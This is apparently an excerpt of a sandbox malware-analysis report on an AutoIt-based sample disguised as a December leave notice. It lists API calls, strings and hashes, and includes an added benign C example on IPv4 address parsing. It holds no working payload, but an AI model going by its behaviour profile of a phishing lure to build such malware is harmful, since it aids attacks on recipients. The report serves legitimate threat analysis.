                                                      • Instruction Fuzzy Hash: EA319C71510644AAEB209F75CC80BFB73A9FF99760F10861AF8A9C7190CA75AC81E760
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC51C6
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FC5201
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 8cc9c7487aa0da5797eed02c5f45161a823c2ab76cde58a3e5dbb1da429f955a
                                                      • Instruction ID: fc716cd8615a0839a1bfe13a601b3e9431bec7281b376be50545b83298755eb4
                                                      • Opcode Fuzzy Hash: 8cc9c7487aa0da5797eed02c5f45161a823c2ab76cde58a3e5dbb1da429f955a
                                                      • Instruction Fuzzy Hash: BA31D532E007069BEB25CF99DA46FDEBBF8BF45760F14401DE981A6190D774B984EB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __snwprintf
                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                      • API String ID: 2391506597-2584243854
                                                      • Opcode ID: b863f5382554fb04a2ea5ba797ddca375a5b610fa84570e55f5ba7bb3386c773
                                                      • Instruction ID: e62d641b7d6921d24f286b3740789fa03ad43dec160d91606e27c24cbe33f71e
                                                      • Opcode Fuzzy Hash: b863f5382554fb04a2ea5ba797ddca375a5b610fa84570e55f5ba7bb3386c773
                                                      • Instruction Fuzzy Hash: 83216D71A00218ABCF10EFA5DC82EEE77B5BF45740F04046AF505EF281DA78E945EBA5
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FE945C
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FE9467
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: cd4e082ebdd5f6cf4a50c1767de050f59132800f3f7b04c531f4bb266ada2c2c
                                                      • Instruction ID: b0d3e5155da0f772e56d20204a814ed46aae09a0d750a58439d7f5dd48502252
                                                      • Opcode Fuzzy Hash: cd4e082ebdd5f6cf4a50c1767de050f59132800f3f7b04c531f4bb266ada2c2c
                                                      • Instruction Fuzzy Hash: 2C11B671704248AFEF21DE55DC80EBB376EEB483B4F104125F954972D0D6759C529770
                                                      APIs
                                                        • Part of subcall function 00F9D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9D1BA
                                                        • Part of subcall function 00F9D17C: GetStockObject.GDI32(00000011), ref: 00F9D1CE
                                                        • Part of subcall function 00F9D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9D1D8
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FE9968
                                                      • GetSysColor.USER32(00000012), ref: 00FE9982
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: 0a95000bd50a55d402f058bcd1a4c62eed84d8ebec196ea175eb857546cfce72
                                                      • Instruction ID: 2a71d6c6d4f45a4264644e89bcc410b3a2d8d7f782cd4196a1fd4c69f8eebe0f
                                                      • Opcode Fuzzy Hash: 0a95000bd50a55d402f058bcd1a4c62eed84d8ebec196ea175eb857546cfce72
                                                      • Instruction Fuzzy Hash: F7116A72510209AFDB15DFB8CC45AEE7BA8FB08314F004618FD95D3151E775E850DB60
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00FE9699
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00FE96A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 78961de2ff39a87b4f59c152db0750f4f8328fd580644e8fccf49f5ce518f8ae
                                                      • Instruction ID: cd83a96c98d72bccc7cefb1cc2ad9d2174dbd188a7138ebc26b84c99caf2cd48
                                                      • Opcode Fuzzy Hash: 78961de2ff39a87b4f59c152db0750f4f8328fd580644e8fccf49f5ce518f8ae
                                                      • Instruction Fuzzy Hash: 6611C172904148ABEF218FA5DC40EEB3769EB05378F100315F964971E0C7B6DC50A770
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC52D5
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FC52F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 24f1724a393531f9e71cb700941dfa56a6a1775f7f1592e1a7b2d798e99a6ab6
                                                      • Instruction ID: 3ba88ce4c9bf11469b3428139391681de1638f55e3196726eac107feed826cb0
                                                      • Opcode Fuzzy Hash: 24f1724a393531f9e71cb700941dfa56a6a1775f7f1592e1a7b2d798e99a6ab6
                                                      • Instruction Fuzzy Hash: CD112676E00616ABDB20DA98DB42FDD77F9AB45B60F040019E842E7190D3B0FD88E790
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FD4DF5
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00FD4E1E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 37ae9d75565373c1c0981c723e97ae85a68fdea1797598a19ff61c7034019c25
                                                      • Instruction ID: f24ec88943d4b32d4ca90cf1da35c1afd4d4fe2e62d6b7f0a23b53e7170846d1
                                                      • Opcode Fuzzy Hash: 37ae9d75565373c1c0981c723e97ae85a68fdea1797598a19ff61c7034019c25
                                                      • Instruction Fuzzy Hash: 3211A071901261BBDB258F91C889FFBFBAAFF06764F14822BF54596240E3706840E6F0
                                                      APIs
                                                      • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00FDA84E
                                                      • htons.WSOCK32(00000000,?,00000000), ref: 00FDA88B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: htonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 3832099526-2422070025
                                                      • Opcode ID: fd6ac7376a9773c9bdbe7c7590f1a4022434218558f092afd0face3eadb77109
                                                      • Instruction ID: 0e0a67255f411914ca82ec65ff375932a93e4e6f11fb6ebbc2b84721d39d9cb6
                                                      • Opcode Fuzzy Hash: fd6ac7376a9773c9bdbe7c7590f1a4022434218558f092afd0face3eadb77109
                                                      • Instruction Fuzzy Hash: BF012635600304ABCB21AFA4C886FA9B365FF44320F10841BF9159B3D1D735E801E756
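The inet_addr/htons call site above carries the literal "255.255.255.255", which is consistent with the standard INADDR_NONE ambiguity check: inet_addr returns INADDR_NONE (0xFFFFFFFF) for a malformed string, but 0xFFFFFFFF is also the valid encoding of the broadcast address, so a caller that wants to accept both has to compare the input text. The following is an added example, not code from the report or from the analysed sample; it uses the POSIX inet_addr, htons and inet_pton from <arpa/inet.h>, which have the same contract as the WSOCK32 exports listed, and the addresses fed to it are constructed inputs.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Legacy path, mirroring the inet_addr/htons call site: accept INADDR_NONE
 * only when the text is literally the broadcast address. Returns 0 and
 * stores the network-order address on success, -1 on a malformed string. */
int parse_ipv4_legacy(const char *text, uint32_t *out)
{
    uint32_t v = (uint32_t)inet_addr(text);
    if (v == INADDR_NONE && strcmp(text, "255.255.255.255") != 0)
        return -1;
    *out = v;
    return 0;
}

/* Preferred path: inet_pton() signals failure out of band, so no string
 * comparison is needed and "255.255.255.255" is just another valid input. */
int parse_ipv4_modern(const char *text, uint32_t *out)
{
    struct in_addr a;
    if (inet_pton(AF_INET, text, &a) != 1)
        return -1;
    *out = a.s_addr;
    return 0;
}

/* Fill a sockaddr_in the way a connect/sendto call site would; 0 on success. */
int build_sockaddr(const char *host, unsigned port, struct sockaddr_in *sa)
{
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    sa->sin_port = htons((uint16_t)port);
    return parse_ipv4_modern(host, &sa->sin_addr.s_addr);
}

/* 1 if `text` parses (modern path) to the given host-order address, else 0. */
int ipv4_equals(const char *text, uint32_t host_order)
{
    uint32_t v;
    return parse_ipv4_modern(text, &v) == 0 && v == htonl(host_order);
}

int main(void)
{
    /* Constructed inputs for the demo; the third and fourth are malformed. */
    const char *samples[] = { "192.0.2.10", "255.255.255.255", "not.an.ip", "256.1.1.1" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint32_t v = 0;
        int legacy = parse_ipv4_legacy(samples[i], &v);
        int modern = parse_ipv4_modern(samples[i], &v);
        printf("%-16s inet_addr=0x%08x legacy=%s modern=%s\n", samples[i],
               (unsigned)inet_addr(samples[i]),
               legacy == 0 ? "ok" : "fail", modern == 0 ? "ok" : "fail");
    }
    struct sockaddr_in sa;
    if (build_sockaddr("192.0.2.10", 443, &sa) == 0)
        printf("sockaddr ready for port %u\n", (unsigned)ntohs(sa.sin_port));
    return 0;
}
```

The raw inet_addr column shows the collision directly: both the broadcast address and the malformed strings come back as 0xffffffff, and only the string comparison (or switching to inet_pton) tells them apart.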
                                                      APIs
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FBB7EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 3850602802-1403004172
                                                      • Opcode ID: 14e56c4c561994d74e610c027358c9f5a1dd55d97f91f22a81737be3c672bbec
                                                      • Instruction ID: 40efa483f57f35a21832de7c18be1168e5debee928d6ceef1fe1f6d6da659037
                                                      • Opcode Fuzzy Hash: 14e56c4c561994d74e610c027358c9f5a1dd55d97f91f22a81737be3c672bbec
                                                      • Instruction Fuzzy Hash: 70012475601114ABCB04FBA4CC529FE33ADBF45310B14061DF462672C2EFB85808ABA0
                                                      APIs
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FBB6EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 3850602802-1403004172
                                                      • Opcode ID: 747117e52be89519a83a9f66df2fc4da5a214caac5c4efde7b390fd3a646b8de
                                                      • Instruction ID: cae157984dd83bf9677bccbbf20af43c98a08750bc0baadfd5956b933ee7d0de
                                                      • Opcode Fuzzy Hash: 747117e52be89519a83a9f66df2fc4da5a214caac5c4efde7b390fd3a646b8de
                                                      • Instruction Fuzzy Hash: 0401A275A41008ABCB14FBA5CD53BFE73AD9F45344F14002DB542B7181EBA85E18ABF5
                                                      APIs
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FBB76C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 3850602802-1403004172
                                                      • Opcode ID: cb3fdedcee4db16eaf125219a42c8e286ccc3e2edfe69d1031083eac71e5e730
                                                      • Instruction ID: 3ad70a87cacdefc5f5febe1064f162eb6b99023a15556e9d76080e61c3c6eac2
                                                      • Opcode Fuzzy Hash: cb3fdedcee4db16eaf125219a42c8e286ccc3e2edfe69d1031083eac71e5e730
                                                      • Instruction Fuzzy Hash: 2D01D176A41104ABCB10FBA5CD02FFE73AC9F45344F240019B842B3192EFA85E09ABB5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: 4ca3046e44f118034074deb1366af3f83bf1efc6474690ff6d8e41fd1340738c
                                                      • Instruction ID: c3e4638452602f12f13dc0ba091bd996fa0fd101e89ef5f827913a0920f5bf7e
                                                      • Opcode Fuzzy Hash: 4ca3046e44f118034074deb1366af3f83bf1efc6474690ff6d8e41fd1340738c
                                                      • Instruction Fuzzy Hash: BCE02277A003282BD720AAE5DC4AE87FBACBB95760F00001AB944E7041D664E60087E0
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00FBA63F
                                                        • Part of subcall function 00FA13F1: _doexit.LIBCMT ref: 00FA13FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Message_doexit
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 1993061046-4017498283
                                                      • Opcode ID: 86e0f548764cee5c7384a9bf2e602cf1b117befbb72838d473f910d9acf10d61
                                                      • Instruction ID: 069821f928a43b042777933016363c176931f9c1696614ae402da529e7eb04ab
                                                      • Opcode Fuzzy Hash: 86e0f548764cee5c7384a9bf2e602cf1b117befbb72838d473f910d9acf10d61
                                                      • Instruction Fuzzy Hash: F0D05B313C432833D61536D97C1BFC5774C9B15BA1F044016BB48995C249DBD54063E9
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00FFACC0
                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FFAEBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: DirectoryFreeLibrarySystem
                                                      • String ID: WIN_XPe
                                                      • API String ID: 510247158-3257408948
                                                      • Opcode ID: 7ceeb340efe556ba49764f0295136faaecf12315765e377eaad385bbb31f6a02
                                                      • Instruction ID: c076de7463f6634936813da4e1310f28b4d5c5bdc7cc05e7dc67fcd804015672
                                                      • Opcode Fuzzy Hash: 7ceeb340efe556ba49764f0295136faaecf12315765e377eaad385bbb31f6a02
                                                      • Instruction Fuzzy Hash: 3BE030B1C001499FCB12DBA4D944AECB7B8AF58300F148082E156B2160DB359A44EF21
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FE86E2
                                                      • PostMessageW.USER32(00000000), ref: 00FE86E9
                                                        • Part of subcall function 00FC7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7AD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: dbc903991bba079056f0ec5ca402bc51e0a97acdb140ec133d7f3a188371b32e
                                                      • Instruction ID: 9b41c667252e41ae7b8aac0b8681efcc398521d4008b1567376a8b5c8b16e43b
                                                      • Opcode Fuzzy Hash: dbc903991bba079056f0ec5ca402bc51e0a97acdb140ec133d7f3a188371b32e
                                                      • Instruction Fuzzy Hash: 9ED0C9317853146BE27967B19C4BFC67A18AB49B11F100819B685AA1C4C9AAA9408B64
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FE86A2
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FE86B5
                                                        • Part of subcall function 00FC7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7AD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 8e22719ed7ab28e773eb8d395884c7a526328b4d6231bef1723636697d6bbf29
                                                      • Instruction ID: e96ff675e46959ff3f00d18f37090fa8714dad023f01f28c5b10878b71dce526
                                                      • Opcode Fuzzy Hash: 8e22719ed7ab28e773eb8d395884c7a526328b4d6231bef1723636697d6bbf29
                                                      • Instruction Fuzzy Hash: 87D01231798314BBE37977F19C4FFC67A18AB44B11F100819B789AE1C4C9EAE940CB64